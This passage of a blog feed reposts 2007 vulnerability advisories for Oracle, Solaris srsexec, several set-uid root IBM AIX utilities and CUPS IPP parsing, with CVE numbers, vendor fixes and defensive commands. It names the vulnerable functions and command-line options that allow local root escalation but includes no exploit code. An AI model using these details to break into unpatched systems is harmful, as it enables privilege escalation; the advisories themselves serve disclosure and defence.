NOTICES&lt;/h4&gt; &lt;p&gt; Copyright � 2007 iDefense, Inc.&lt;br /&gt;&lt;br /&gt;Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail &lt;a href="javascript:void(0);" onclick="obfusc('customerservice');"&gt;customer service&lt;/a&gt; for permission.&lt;br /&gt;&lt;br /&gt;Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.&lt;/p&gt;&lt;/div&gt; &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-7388288290741362464?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/7388288290741362464/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=7388288290741362464' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/7388288290741362464'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/7388288290741362464'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2008/02/oracle-10g-r2-pitrigdropmetadata-buffer.html' title='Oracle 10g R2 PITRIG_DROPMETADATA Buffer Overflow Vulnerability'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-935736923048745037</id><published>2008-02-08T07:07:00.000-08:00</published><updated>2008-02-08T07:08:54.483-08:00</updated><title type='text'>Sun Microsystems Solaris srsexec Format String Vulnerability</title><content type='html'>tomado de:http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=610&lt;br /&gt;&lt;div class="cWhite" style="position: absolute; left: 1px; top: 1px; z-index: 7; width: 100%;"&gt;PUBLIC ADVISORY: 11.02.07&lt;/div&gt;    &lt;div id="div_breadcrumb" class="cWhite"&gt; &lt;a href="http://labs.idefense.com/"&gt;Home&lt;/a&gt; // &lt;a href="http://labs.idefense.com/intelligence"&gt;Current Intelligence&lt;/a&gt; // &lt;a href="http://labs.idefense.com/intelligence/vulnerabilities"&gt;Vulnerability Advisories&lt;/a&gt; // Public Advisory: 11.02.07&lt;/div&gt;      &lt;div id="div_icons" class="fltR"&gt;&lt;a href="javascript:void(0);" onclick="toggleItem('div_emailURL',1);" onmouseover="imgHilite('img_icn_em'); return true;" onmouseout="imgUnHilite('img_icn_em');" title="Email This Page URL"&gt;&lt;img id="img_icn_em" name="img_icn_em" src="http://labs.idefense.com/graphics/template/icons/email_off.gif" alt="Email This Page URL" border="0" height="10" width="45" /&gt;&lt;/a&gt;  &lt;a href="javascript:void(0);" onclick="window.print();" onmouseover="imgHilite('img_icn_pf'); return true;" onmouseout="imgUnHilite('img_icn_pf');" title="Print This Page"&gt;&lt;img id="img_icn_pf" name="img_icn_pf" src="http://labs.idefense.com/graphics/template/icons/print_off.gif" alt="Print This Page" border="0" height="10" width="48" /&gt;&lt;/a&gt;&lt;/div&gt;    &lt;!-- START PAGE CONTENT //--&gt;         &lt;!-- START FIRST COLUMN CONTENT //--&gt;  &lt;div class="p8px fJustify"&gt;    &lt;div class="intelHeadline"&gt;Sun Microsystems Solaris srsexec Format String Vulnerability&lt;/div&gt;  &lt;div class="intelBody"&gt;&lt;h4&gt;I. BACKGROUND&lt;/h4&gt; &lt;p&gt; The srsexec utility is part of the SRS Proxy Core package that is available with Solaris 10. This package is used to monitor the performance of clients running Solaris from a centralized administrative console. This software would be installed on all of the client machines being monitored and is set-uid root by default. More information is available at the vendor's site.   &lt;/p&gt; &lt;p&gt; &lt;a target="_blank" href="http://www.sun.com/service/netconnect/"&gt;http://www.sun.com/service/netconnect/&lt;/a&gt;   &lt;/p&gt;  &lt;h4&gt;II. DESCRIPTION&lt;/h4&gt; &lt;p&gt; Local exploitation of a format string vulnerability in the srsexec binary, optionally included in Sun Microsystems Inc.'s Solaris 10, allows attackers to execute arbitrary code with root privileges.   &lt;/p&gt; &lt;p&gt; The vulnerability exists since attacker supplied data is passed directly to the syslog() function as the format string. This allows an attacker to overwrite arbitrary memory with arbitrary data, and can result in the execution of arbitrary code with root privileges.   &lt;/p&gt;  &lt;h4&gt;III. ANALYSIS&lt;/h4&gt; &lt;p&gt; Exploitation results in the execution of arbitrary code with root privileges. In order to exploit this vulnerability, an attacker must have the ability to execute the set-uid root binary.   &lt;/p&gt; &lt;p&gt; The SRS Proxy Core package is not installed by default, but it is a common application.   &lt;/p&gt;  &lt;h4&gt;IV. DETECTION&lt;/h4&gt; &lt;p&gt; iDefense has confirmed the existence of this vulnerability in Solaris 10 with the SUNWsrspx package installed. In order to determine if this package is installed, an administrator can execute the following command:   &lt;/p&gt; &lt;pre&gt;  pkginfo SUNWsrspx&lt;br /&gt;&lt;/pre&gt; &lt;p&gt; If this command returns 'ERROR: information for "SUNWsrspx" was not found', then the system does not have the affected package installed and is not vulnerable.   &lt;/p&gt;  &lt;h4&gt;V. WORKAROUND&lt;/h4&gt; &lt;p&gt; To prevent exploitation of this vulnerability, remove the set-uid bit from the srsexec binary as shown below.   &lt;/p&gt; &lt;pre&gt;  # chmod -s /opt/SUNWsrspx/bin/srsexec&lt;br /&gt;&lt;/pre&gt;  &lt;h4&gt;VI. VENDOR RESPONSE&lt;/h4&gt; &lt;p&gt; Sun Microsystems has addressed this vulnerability by releasing patches. For more information, consult Sun Alert 103119 at the following URL.   &lt;/p&gt; &lt;p&gt; &lt;a target="_blank" href="http://sunsolve.sun.com/search/document.do?assetkey=1-26-103119-1"&gt;http://sunsolve.sun.com/search/document.do?assetkey=1-26-103119-1&lt;/a&gt;   &lt;/p&gt;  &lt;h4&gt;VII. CVE INFORMATION&lt;/h4&gt; &lt;p&gt; The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-3880 to this issue. This is a candidate for inclusion in the CVE list (&lt;a target="_blank" href="http://cve.mitre.org/"&gt;http://cve.mitre.org/&lt;/a&gt;), which standardizes names for security problems.   &lt;/p&gt;  &lt;h4&gt;VIII. DISCLOSURE TIMELINE&lt;/h4&gt; &lt;p&gt; 07/18/2007  Initial vendor notification&lt;br /&gt;07/18/2007  Initial vendor response&lt;br /&gt;11/02/2007  Coordinated public disclosure&lt;br /&gt;&lt;/p&gt; &lt;h4&gt;IX. CREDIT&lt;/h4&gt; &lt;p&gt; This vulnerability was discovered by Sean Larsson of VeriSign iDefense Labs.   &lt;/p&gt;  &lt;p&gt;Get paid for vulnerability research&lt;br /&gt;&lt;a href="http://labs.idefense.com/methodology/vulnerability/vcp.php"&gt;http://labs.idefense.com/methodology/vulnerability/vcp.php&lt;/a&gt;&lt;/p&gt; &lt;p&gt;Free tools, research and upcoming events&lt;br /&gt;&lt;a href="http://labs.idefense.com/"&gt;http://labs.idefense.com/&lt;/a&gt;&lt;/p&gt;  &lt;h4&gt;X. LEGAL NOTICES&lt;/h4&gt; &lt;p&gt; Copyright � 2007 iDefense, Inc.&lt;br /&gt;&lt;br /&gt;Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail &lt;a href="javascript:void(0);" onclick="obfusc('customerservice');"&gt;customer service&lt;/a&gt; for permission.&lt;br /&gt;&lt;br /&gt;Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition.  There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.&lt;/p&gt;&lt;/div&gt; &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-935736923048745037?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/935736923048745037/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=935736923048745037' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/935736923048745037'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/935736923048745037'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2008/02/sun-microsystems-solaris-srsexec-format.html' title='Sun Microsystems Solaris srsexec Format String Vulnerability'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-1078304298193240230</id><published>2008-02-08T07:06:00.000-08:00</published><updated>2008-02-08T07:07:41.921-08:00</updated><title type='text'>IBM AIX Multiple Vulnerabilities</title><content type='html'>tomado de:http://www.securiteam.com/unixfocus/6R0080AKAA.html&lt;br /&gt;&lt;br /&gt;&lt;table id="ArticleTABLE" style="width: 100%;" border="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;table id="ArticleTitle" width="100%"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="header" style="font-size: 150%;" width="80%"&gt;IBM AIX Multiple Vulnerabilities&lt;/td&gt;           &lt;td class="header" style="text-align: right;"&gt;1 Nov. 2007&lt;/td&gt;          &lt;/tr&gt;         &lt;/tbody&gt;&lt;/table&gt;        &lt;/td&gt;       &lt;/tr&gt;       &lt;tr&gt;        &lt;td&gt; &lt;/td&gt;       &lt;/tr&gt;       &lt;tr&gt;        &lt;td class="header" style="background: rgb(138, 140, 226) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; color: rgb(255, 255, 255);"&gt; Summary&lt;/td&gt;       &lt;/tr&gt;              &lt;tr align="left"&gt;        &lt;td&gt;&lt;excerpt&gt;Multiple vulnerabilities have been discovered in IBM AIX. These vulnerabilities would allow local exploitation that could lead to elevated privileges&lt;/excerpt&gt;.&lt;/td&gt;       &lt;/tr&gt;       &lt;tr&gt;        &lt;td&gt; &lt;/td&gt;       &lt;/tr&gt;              &lt;tr align="left"&gt;        &lt;td&gt;&lt;b&gt;Credit:&lt;/b&gt;&lt;br /&gt;       The information has been provided by &lt;b&gt;iDefense&lt;/b&gt;.&lt;br /&gt;The original article can be found at: &lt;a href="http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=617"&gt;http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=617&lt;/a&gt;, &lt;a href="http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=616"&gt;http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=616&lt;/a&gt;, &lt;a href="http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=615"&gt;http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=615&lt;/a&gt;, &lt;a href="http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=614"&gt;http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=614&lt;/a&gt;, &lt;a href="http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=613"&gt;http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=613&lt;/a&gt;, &lt;a href="http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=612"&gt;http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=612&lt;/a&gt;, &lt;a href="http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=611"&gt;http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=611&lt;/a&gt;  &lt;br /&gt; &lt;br /&gt;        &lt;/td&gt;       &lt;/tr&gt;       &lt;tr&gt;        &lt;td&gt; &lt;/td&gt;       &lt;/tr&gt;       &lt;tr&gt;        &lt;td class="header" style="background: rgb(138, 140, 226) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; color: rgb(255, 255, 255);"&gt; Details&lt;/td&gt;       &lt;/tr&gt;       &lt;tr align="left"&gt;        &lt;td&gt;   &lt;!-- CC_IMAGE_SELECTION_START --&gt;   &lt;!--   &lt;script type="text/javascript" src="http://apollo.creativecalls.com/ServedByCreativeCalls/AdSelection?campaignName=beyondsecurity"&gt;&lt;/script&gt;   &lt;script type="text/javascript"&gt;    try{    connectionStatus = checkConnectionStatus();    }catch(err){    document.write('&lt;div style="float: right; width: 300px; height: 4em; border: 1px solid #999; margin-left: 1em; margin-bottom: 1em; padding: 1em; text-align: center;"&gt;&lt;a href="http://www.securiteam.com/wssa0205"&gt;Audit your web server for security holes - see what the hackers see.&lt;br /&gt;Sign up for a scan today - risk free!&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;');   }   &lt;/script&gt;   --&gt;   &lt;!-- CC_IMAGE_SELECTION_STOP --&gt;   &lt;div style="border: 1px solid rgb(153, 153, 153); padding: 1em; float: right; width: 300px; height: 4em; margin-left: 1em; margin-bottom: 1em; text-align: center;"&gt;&lt;a href="http://www.securiteam.com/wssa0205"&gt;Audit your web server for security holes - see what the hackers see.&lt;br /&gt;Sign up for a scan today - risk free!&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;      &lt;b&gt;Vulnerable Systems:&lt;/b&gt;&lt;br /&gt; * IBM AIX version 5.3 (5300-06) - ftp&lt;br /&gt; * IBM AIX version 5.3 (5300-06) and 5.2 - bellmail, lquerypv, lqueryvg&lt;br /&gt; * IBM AIX version 5.2 - dig, crontab, swcons&lt;br /&gt;&lt;br /&gt;&lt;b&gt;IBM AIX ftp domacro Parameter Buffer Overflow Vulnerability&lt;/b&gt;&lt;br /&gt;The ftp program is a client application for accessing data stored on FTP servers. This client is responsible for interfacing with users and speaking the FTP protocol with remote servers. Under AIX, the ftp program is installed by default and is set-uid root.&lt;br /&gt;&lt;br /&gt;Local exploitation of a buffer overflow vulnerability in the ftp client of IBM Corp.'s AIX operating system allows attackers to execute arbitrary code with root privileges.&lt;br /&gt;&lt;br /&gt;The problem specifically exists within the domacro() function. This function is called when executing a macro via the '$' command within the ftp program. When executing a macro, the parameter is copied to a fixed size stack buffer using an unbounded call to strcpy(). By specifying a long argument, an attacker is able to overwrite program control data located on the stack and take control of the affected process.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Vendor response:&lt;/b&gt;&lt;br /&gt;IBM Corp. has addressed this vulnerability by releasing interim fixes. More information can be found via the Bulletins tab of IBM's Subscription Service for UNIX and Linux servers. You can reach this service by clicking the URL shown below: &lt;a href="http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=1"&gt;http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=1&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;CVE Information:&lt;/b&gt;&lt;br /&gt;&lt;a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4217"&gt;CVE-2007-4217&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;IBM AIX bellmail Stack Buffer Overflow Vulnerability&lt;/b&gt;&lt;br /&gt;bellmail is a mail user-agent (MUA) and is commonly used for accessing locally stored electronic mail messages. Under AIX, the bellmail program is installed by default and is set-uid root.&lt;br /&gt;&lt;br /&gt;Local exploitation of a buffer overflow vulnerability in the bellmail program of IBM Corp.'s AIX operating system allows attackers to execute arbitrary code with root privileges.&lt;br /&gt;&lt;br /&gt;The problem specifically exists within sendrmt function. This function is called when a user tries to send mail using the "m" command. Within this function, several sprintf calls are made to concatenate user-supplied input with static strings. No bounds checking is performed to ensure that the resulting string will fit in the destination buffer located on the stack. By supplying a long parameter, an attacker is able to overwrite program control data located on the stack and take control of the affected process.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Vendor response:&lt;/b&gt;&lt;br /&gt;IBM Corp. has addressed this vulnerability by releasing interim fixes. More information can be found via the Bulletins tab of IBM's Subscription Service for UNIX and Linux servers. You can reach this service by clicking the URL shown below. &lt;a href="http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=1"&gt;http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=1&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;CVE Information:&lt;/b&gt;&lt;br /&gt;&lt;a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4623"&gt;CVE-2007-4623&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;IBM AIX lquerypv Stack Buffer Overflow Vulnerability&lt;/b&gt;&lt;br /&gt;The lquerypv utility is used to examine the properties of a physical volume in a volume group. It is installed set-uid root by default on multiple versions of AIX.&lt;br /&gt;&lt;br /&gt;Local exploitation of a stack buffer overflow vulnerability in IBM Corp.'s AIX operating system may allow an attacker to execute arbitrary code with root privileges.&lt;br /&gt;&lt;br /&gt;The vulnerability exists within the parsing of the '-V' command line option. The argument to this option is copied into a fixed size stack buffer using the sprintf() function without properly validating the length. This leads to an exploitable stack buffer overflow.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Vendor response:&lt;/b&gt;&lt;br /&gt;IBM Corp. has addressed this vulnerability by releasing interim fixes. More information can be found via the Bulletins tab of IBM's Subscription Service for UNIX and Linux servers. You can reach this service by clicking the URL shown below:&lt;br /&gt;&lt;a href="http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=1"&gt;http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=1&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;CVE Information:&lt;/b&gt;&lt;br /&gt;&lt;a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4513"&gt;CVE-2007-4513&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;IBM AIX lqueryvg Stack Buffer Overflow Vulnerability&lt;/b&gt;&lt;br /&gt;The lqueryvg utility is used to examine the properties of disk volume groups. It is installed set-uid root by default on multiple versions of AIX.&lt;br /&gt;&lt;br /&gt;Local exploitation of a stack buffer overflow vulnerability in IBM Corp.'s AIX operating system may allow an attacker to execute arbitrary code with root privileges.&lt;br /&gt;&lt;br /&gt;The vulnerability exists within the parsing of the '-p' command line option. The argument to this option is copied into a fixed size stack buffer using the sprintf() function without properly validating the length. This leads to an exploitable stack buffer overflow.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Vendor response:&lt;/b&gt;&lt;br /&gt;IBM Corp. has addressed this vulnerability by releasing interim fixes. More information can be found via the Bulletins tab of IBM's Subscription Service for UNIX and Linux servers. You can reach this service by clicking the URL shown below: &lt;a href="http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=1"&gt;http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=1&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;CVE Information:&lt;/b&gt;&lt;br /&gt;&lt;a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4513"&gt;CVE-2007-4513&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;IBM AIX dig dns_name_fromtext Integer Underflow Vulnerability&lt;/b&gt;&lt;br /&gt;dig is a utility that is commonly used for DNS diagnostics. Under AIX 5.2, the dig program is installed by default and is set-uid root.&lt;br /&gt;&lt;br /&gt;Local exploitation of an integer underflow vulnerability in the dig program of IBM Corp.'s AIX operating system allows attackers to execute arbitrary code with root privileges.&lt;br /&gt;&lt;br /&gt;The problem specifically exists within dns_name_fromtext function within the libdns.a library. This function is called when processing the '-y' command line parameter to the dig program. By supplying a specially crafted TSIG key parameter, an attacker is able to cause an integer underflow, resulting in potentially exploitable heap corruption.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Vendor response:&lt;/b&gt;&lt;br /&gt;IBM Corp. has addressed this vulnerability by releasing interim fixes. More information can be found via the Bulletins tab of IBM's Subscription Service for UNIX and Linux servers. You can reach this service by clicking the URL shown below: &lt;a href="http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=1"&gt;http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=1&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;CVE Information:&lt;/b&gt;&lt;br /&gt;&lt;a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4622"&gt;CVE-2007-4622&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;IBM AIX 5.2 crontab BSS Buffer Overflow Vulnerability&lt;/b&gt;&lt;br /&gt;The crontab program is a user utility that enables users to create, remove, and edit cron jobs. The cron jobs will then later be executed, on behalf of the user, at the specified time. Under AIX, the crontab program is installed by default and is set-uid root.&lt;br /&gt;&lt;br /&gt;Local exploitation of a buffer overflow vulnerability in the crontab program of IBM Corp.'s AIX 5.2 operating system allows attackers to execute arbitrary code with root privileges.&lt;br /&gt;&lt;br /&gt;The problem specifically exists within the main function. While processing command line arguments, the crontab program will copy a user-supplied argument to a fixed size BSS (data segment) buffer. Since no bounds checking is performed, it's possible to overwrite a large portion of the data stored in the BSS memory area.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Vendor response:&lt;/b&gt;&lt;br /&gt;IBM Corp. has addressed this vulnerability by releasing interim fixes. More information can be found via the Bulletins tab of IBM's Subscription Service for UNIX and Linux servers. You can reach this service by clicking the URL shown below. &lt;a href="http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=1"&gt;http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=1&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;CVE Information:&lt;/b&gt;&lt;br /&gt;&lt;a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4621"&gt;CVE-2007-4621&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;IBM AIX swcons Local Arbitrary File Access Vulnerability&lt;/b&gt;&lt;br /&gt;The swcons program is a set-uid root application which is installed by default on IBM AIX. It allows for console logs to be temporarily logged to a file or device.&lt;br /&gt;&lt;br /&gt;Local exploitation of a file access vulnerability in the swcons command included in multiple versions of IBM Corp.'s AIX could allow for the creation or modification of arbitrary files anywhere on the system.&lt;br /&gt;&lt;br /&gt;The vulnerability specifically exists due to a lack of sanity checking when using the -p option. If a user specifies a file with the -p option, the contents of that file will be overwritten with 65,535 bytes of uncontrolled data. If the file doesn't exist, it will be created. In both cases, the file will also be converted to mode 222, which allows all users on the system to modify it. By specifying a system file, users can cause a denial of service condition or elevate privileges.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Vendor response:&lt;/b&gt;&lt;br /&gt;IBM Corp. has addressed this vulnerability by releasing interim fixes. More information can be found via the Bulletins tab of IBM's Subscription Service for UNIX and Linux servers. You can reach this service by clicking the URL shown below: &lt;a href="http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=1"&gt;http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=1&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-1078304298193240230?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/1078304298193240230/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=1078304298193240230' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/1078304298193240230'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/1078304298193240230'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2008/02/ibm-aix-multiple-vulnerabilities.html' title='IBM AIX Multiple Vulnerabilities'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-6692306353019236492</id><published>2008-02-08T07:05:00.000-08:00</published><updated>2008-02-08T07:06:20.409-08:00</updated><title type='text'>CUPS IPP Tags Memory Corruption Vulnerability</title><content type='html'>tomado de:http://secunia.com/secunia_research/2007-76/advisory/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Secunia Research: CUPS IPP Tags Memory Corruption Vulnerability&lt;br /&gt;&lt;br /&gt;====================================================================== &lt;br /&gt;&lt;br /&gt;                     Secunia Research 31/10/2007&lt;br /&gt;&lt;br /&gt;           - CUPS IPP Tags Memory Corruption Vulnerability -&lt;br /&gt;&lt;br /&gt;====================================================================== &lt;br /&gt;Table of Contents&lt;br /&gt;&lt;br /&gt;Affected Software....................................................1&lt;br /&gt;Severity.............................................................2&lt;br /&gt;Vendor's Description of Software.....................................3&lt;br /&gt;Description of Vulnerability.........................................4&lt;br /&gt;Solution.............................................................5&lt;br /&gt;Time Table...........................................................6&lt;br /&gt;Credits..............................................................7&lt;br /&gt;References...........................................................8&lt;br /&gt;About Secunia........................................................9&lt;br /&gt;Verification........................................................10&lt;br /&gt;&lt;br /&gt;====================================================================== &lt;br /&gt;1) Affected Software &lt;br /&gt;&lt;br /&gt;* CUPS 1.3.3.&lt;br /&gt;&lt;br /&gt;NOTE: Other versions may also be affected.&lt;br /&gt;&lt;br /&gt;====================================================================== &lt;br /&gt;2) Severity &lt;br /&gt;&lt;br /&gt;Rating: Moderately Critical&lt;br /&gt;Impact: System Access&lt;br /&gt;Where:  Local network&lt;br /&gt;&lt;br /&gt;====================================================================== &lt;br /&gt;3) Vendor's Description of Software &lt;br /&gt;&lt;br /&gt;"CUPS provides a portable printing layer for UNIXÂ®-based operating &lt;br /&gt;systems. It was developed by Easy Software Products and is now owned &lt;br /&gt;and maintained by Apple Inc. to promote a standard printing solution.&lt;br /&gt;It is the standard printing system in Mac OS X and most Linux &lt;br /&gt;distributions".&lt;br /&gt;&lt;br /&gt;Product Link:&lt;br /&gt;http://www.cups.org/&lt;br /&gt;&lt;br /&gt;====================================================================== &lt;br /&gt;4) Description of Vulnerability&lt;br /&gt;&lt;br /&gt;Secunia Research has discovered a vulnerability in CUPS, which can be &lt;br /&gt;exploited by malicious people to compromise a vulnerable system.&lt;br /&gt;&lt;br /&gt;The vulnerability is caused due to a boundary error within the &lt;br /&gt;"ippReadIO()" function in cups/ipp.c when processing IPP (Internet &lt;br /&gt;Printing Protocol) tags. This can be exploited to overwrite one byte &lt;br /&gt;on the stack with a zero by sending an IPP request containing &lt;br /&gt;specially crafted "textWithLanguage" or "nameWithLanguage" tags.&lt;br /&gt;&lt;br /&gt;Successful exploitation allows execution of arbitrary code.&lt;br /&gt;&lt;br /&gt;====================================================================== &lt;br /&gt;5) Solution &lt;br /&gt;&lt;br /&gt;Patches for various Linux distributions should be available shortly.&lt;br /&gt;&lt;br /&gt;====================================================================== &lt;br /&gt;6) Time Table &lt;br /&gt;&lt;br /&gt;16/10/2007 - Vendor notified.&lt;br /&gt;22/10/2007 - vendor-sec notified.&lt;br /&gt;31/10/2007 - Public disclosure.&lt;br /&gt;&lt;br /&gt;====================================================================== &lt;br /&gt;7) Credits &lt;br /&gt;&lt;br /&gt;Discovered by Alin Rad Pop, Secunia Research.&lt;br /&gt;&lt;br /&gt;====================================================================== &lt;br /&gt;8) References&lt;br /&gt;&lt;br /&gt;The Common Vulnerabilities and Exposures (CVE) project has assigned &lt;br /&gt;CVE-2007-4351 for the vulnerability.&lt;br /&gt;&lt;br /&gt;====================================================================== &lt;br /&gt;9) About Secunia&lt;br /&gt;&lt;br /&gt;Secunia offers vulnerability management solutions to corporate&lt;br /&gt;customers with verified and reliable vulnerability intelligence&lt;br /&gt;relevant to their specific system configuration:&lt;br /&gt;&lt;br /&gt;http://corporate.secunia.com/&lt;br /&gt;&lt;br /&gt;Secunia also provides a publicly accessible and comprehensive advisory&lt;br /&gt;database as a service to the security community and private &lt;br /&gt;individuals, who are interested in or concerned about IT-security.&lt;br /&gt;&lt;br /&gt;http://secunia.com/&lt;br /&gt;&lt;br /&gt;Secunia believes that it is important to support the community and to&lt;br /&gt;do active vulnerability research in order to aid improving the &lt;br /&gt;security and reliability of software in general:&lt;br /&gt;&lt;br /&gt;http://corporate.secunia.com/secunia_research/33/&lt;br /&gt;&lt;br /&gt;Secunia regularly hires new skilled team members. Check the URL below&lt;br /&gt;to see currently vacant positions:&lt;br /&gt;&lt;br /&gt;http://secunia.com/secunia_vacancies/&lt;br /&gt;&lt;br /&gt;Secunia offers a FREE mailing list called Secunia Security Advisories:&lt;br /&gt;&lt;br /&gt;http://secunia.com/secunia_security_advisories/ &lt;br /&gt;&lt;br /&gt;====================================================================== &lt;br /&gt;10) Verification &lt;br 